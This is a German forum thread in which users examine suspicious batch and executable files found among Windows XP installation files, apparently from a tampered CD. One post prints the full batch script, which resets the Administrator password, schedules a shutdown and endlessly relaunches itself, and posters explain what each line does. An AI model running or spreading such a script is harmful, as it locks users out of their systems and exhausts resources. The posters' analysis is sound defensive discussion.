Archiv Windows XP 25.916 Themen, 128.567 Beiträge

Verfolgung starten Optionen

Hat Microsoft bei XP einen Trojaner/keylogger mitinstallier?

Jacky4 / 17 Antworten / Baumansicht Nickles

Hallo Leute

Habe heute mal meinen Alten PC wieder fertig machen wollen und ne falsche Festplatte genommen. wollte eigendlich ne andere nehmen und diese für daten. Hatte aber schon die Installations Dateien raufkopiren lassen. Also habe ich die HDD an meinem derzeitigen PC angeschlossen und wollte die Platte formatieren.
Um zu sehen ob Windows sie erkannt hatte, ging ich in den Arbeitsplatz (da es mich schon ne zeitlang intereessiert, habe ich mir auch mal alle daten zur Installation angesehen). Dort entdeckte ich nun eine Datei die mich irgendwie Stuzig machte.
Habe hier nen Bild davon: http://www.bilder-hochladen.net/files/6nf5-1-png.html
Jetzt frage ich mich natürlich: Warum steckt Microsft solche Dateien zu den Inastallations Dateien, warum überhaupt soclche Dateien? Am wesentlichen ist aber für mich, ist das bei allen XP Professional Installationen so(dann währe mein derzeitiger PC auch betroffen)
bitte um Rat/Hilfe
mfg Jacky

Max Payne Jacky4 „Hat Microsoft bei XP einen Trojaner/keylogger mitinstallier?“
Optionen

Installierst Du von einem Originaldatenträger oder ist das eine Windows-Version, die das Tageslicht eher scheut?

ABatC Max Payne „Installierst Du von einem Originaldatenträger oder ist das eine...“
Optionen

Oder ist das eventuell eine Recovery-Version, bei der schon jede Menge Krempel/Treiber mitinstalliert ist?

Ich kann die beiden Dateien bei meinem Windows XP pro zumindest nicht lokalisieren, weder auf der CD noch auf der Festplatte...

dalai Jacky4 „Hat Microsoft bei XP einen Trojaner/keylogger mitinstallier?“
Optionen

Ich kann diese Dateien bei mir ebenfalls nicht finden. Google spuckt auch nichts zu diesen Dateinamen aus.
Aber was steht denn in der khook.bat drin? Rechtsklick drauf -> Bearbeiten und den Inhalt hier posten.

MfG Dalai

Jacky4 dalai „Ich kann diese Dateien bei mir ebenfalls nicht finden. Google spuckt auch nichts...“
Optionen

Also diese Dateien sind nur da (bei mir) wenn ich nur die Daten auf die HDD kopiert habe und noch nicht installiert.
Nein es ist keie Recovery und auch keine illegal gezogenen. Dies ist eine Original Version die letztes Jahr gekauft wurde.
da ich mich mit den sachen nicht so gut auskenne werde ich sie euch einfach mal hochladen http://www.loaditup.de/225552.html hier ist die bat die exe bekomme ich immoment nicht hoch

shrek3 Jacky4 „Also diese Dateien sind nur da bei mir wenn ich nur die Daten auf die HDD...“
Optionen

So 100%-ig kann ich das auch nicht auflösen.
Es hat aber etwas mit dem Administratorkontos zu tun, den XP bei der Installation anlegt.
http://www.administrator.de/Administrator_Konto_per_Batchdatei_umbenennen_und_Passwort_%C3%A4ndern.html

Gruß
Shrek3

dalai shrek3 „So 100 -ig kann ich das auch nicht auflösen. Es hat aber etwas mit dem...“
Optionen

Das geht schonmal in eine gute Richtung, aber trotzdem muss es entweder eine Recovery, eine selbstgebaute oder verseuchte CD sein. Auf keiner meiner XP-CDs ist das Zeug enthalten und ich sehe auch keinen Sinn dahinter.
Hier mal der Inhalt der Batch, damit alle sehen, worum es geht:

-------------------------------------------------------
@echo off & setlocal
shutdown -s -d 15
:A
set "KontoAlt=Administrator"
set "PWNeu=Microsoft"
net user %KontoAlt% "%PWNeu%"
echo I say to Microsoft: I hate this job. Jason
start EXPLORER
start khook.bat
start label.exe
start KHwertLogg.exe
goto: A
----------------------------------------------------

Am lustigsten finde ich den ersten Befehl: der ist falsch, weil Windows lediglich eine Hilfe zum Befehl shutdown ausgibt.
Dann wird dem vorhandenen Adminkonto ein neues Passwort Microsoft verpasst.
Danach wird ein Explorer gestartet - wozu?
Dann folgt rekursiv der Aufruf der Batchdatei selbst - wozu?
Dann wird das Programm label gestartet, mit dem man einen Datenträger benennen kann, aber Schaden anrichten kann man damit auch nicht (schon gar nicht, wenn es ohne Eingabedatenstrom gestartet wird).
Was das Programm KHwertLogg.exe macht, darüber kann ich nur spekulieren.
Am Ende wird der ganze Kram wiederholt, so dass alles 1. in einer Schleife in derselben Konsole endlos wiederholt wird und 2. jede Wiederholung eine neue Instanz der Batch startet.

Was damit erreicht werden soll, ist mir unklar. Was aber mit Sicherheit passiert (aus Spaß in einer VM probiert): der Speicher wird immer voller und damit irgendwann knapp, aber wozu? Dazu müsste man wohl wissen, was die EXE tut.

EDIT:
Gewollt ist wahrscheinlich das Runterfahren des Systems (deswegen der Shutdown) und eine unmittelbar vorher durchgeführte Passwortänderung des Administrators.
Das hätte zur Folge, dass sich der User nicht mehr am System (mit dem gewohnten Passwort) anmelden kann.

MfG Dalai

Max Payne dalai „Das geht schonmal in eine gute Richtung, aber trotzdem muss es entweder eine...“
Optionen

Das beste ist diese Zeile:
echo I say to Microsoft: I hate this job. Jason

Und die exe-Datei wird auch nicht aufgerufen, weil sie falsch geschrieben wurde (...logg.exe statt ...log.exe)

dalai Max Payne „Das beste ist diese Zeile: Und die exe-Datei wird auch nicht aufgerufen, weil...“
Optionen
Und die exe-Datei wird auch nicht aufgerufen, weil sie falsch geschrieben wurde (...logg.exe statt ...log.exe)
Stimmt. Darauf hab ich gar nicht geachtet.

MfG Dalai
jueki Jacky4 „Hat Microsoft bei XP einen Trojaner/keylogger mitinstallier?“
Optionen

Habt Ihr irgend etwas mit Aquaristik zu tun?
Der KH- Wert ist ein (soweit mir bekannt ist) in der Aquaristik gebräuchlicher Begriff für die Karbonhärte. Und irgendwie meine ich, da von einem Programm gehört zu haben, was diese daten erfaßt und auswertet.
Wenn das stimmt, es ist nur eine vage Erinnerung, würde das die Datei "KHwertLog erklären.

Jürgen

Olaf19 jueki „Habt Ihr irgend etwas mit Aquaristik zu tun? Der KH- Wert ist ein soweit mir...“
Optionen

*SCNR*
Olaf

gelöscht_84526 Olaf19 „Und ich dachte, es wäre der King-Heinz-Wert :-D“
Optionen

Falls du es noch nicht gewusst haben solltest: Ich bin ein Trojaner. Ganz Nickles ist von mir infiziert, ich tauche auf fast allen Brettern auf.

So, jetzt haben wir das auch mal klargestellt...

Gruß
K.-H.

jueki gelöscht_84526 „Falls du es noch nicht gewusst haben solltest: Ich bin ein Trojaner. Ganz...“
Optionen

Ach - jetzt wird mir so einiges klar...
Hm.
Jürgen

Conqueror Jacky4 „Hat Microsoft bei XP einen Trojaner/keylogger mitinstallier?“
Optionen

Installation enthalten.

Lukas9Gelöscht Conqueror „Normal sind diese Dateien auf keiner mir bekannten“
Optionen

"Installation enthalten"

Was ?!

Olaf19 Lukas9Gelöscht „ Installation enthalten Was ?!“
Optionen

"Normal sind diese Dateien auf keiner mir bekannten ... Installation enthalten"

Conqueror hat die Eigenart, seine Antworten in der Überschrift zu beginnen und das eigentliche Posting als "Überlaufbecken" zu benutzen :-)

Cheers
Olaf

Lukas9Gelöscht Olaf19 „Du musst die Überschrift mit dazu nehmen :-)“
Optionen

Ach so... :-D

@Conqueror: Ist es nicht einfacher, den Text selber in das dafür vorgesehene Feld zu schreiben und die Überschrift einfach lassen? Macht doch weniger Arbeit ;-)

Gruß Lukas

gelöscht_23570 Lukas9Gelöscht „Ach so... :-D @Conqueror: Ist es nicht einfacher, den Text selber in das dafür...“
Optionen

Macht eigentlich mehr Arbeit.

Warum in der Überschrift das selbe schreiben wie in der Antwort, zumal die nur aus einem Satz besteht.

Aber zur Sache: Ich halte die angeführten Dateien auch für "nicht ganz koscher". Die sind mir bei diversen Slipstream-Aktionen noch nie aufgefallen.

Allerdings habe noch nie wärend der Installation auf der Platte geguckt, was Windows da so temporär an Dateien anlegt.


Gruß Alois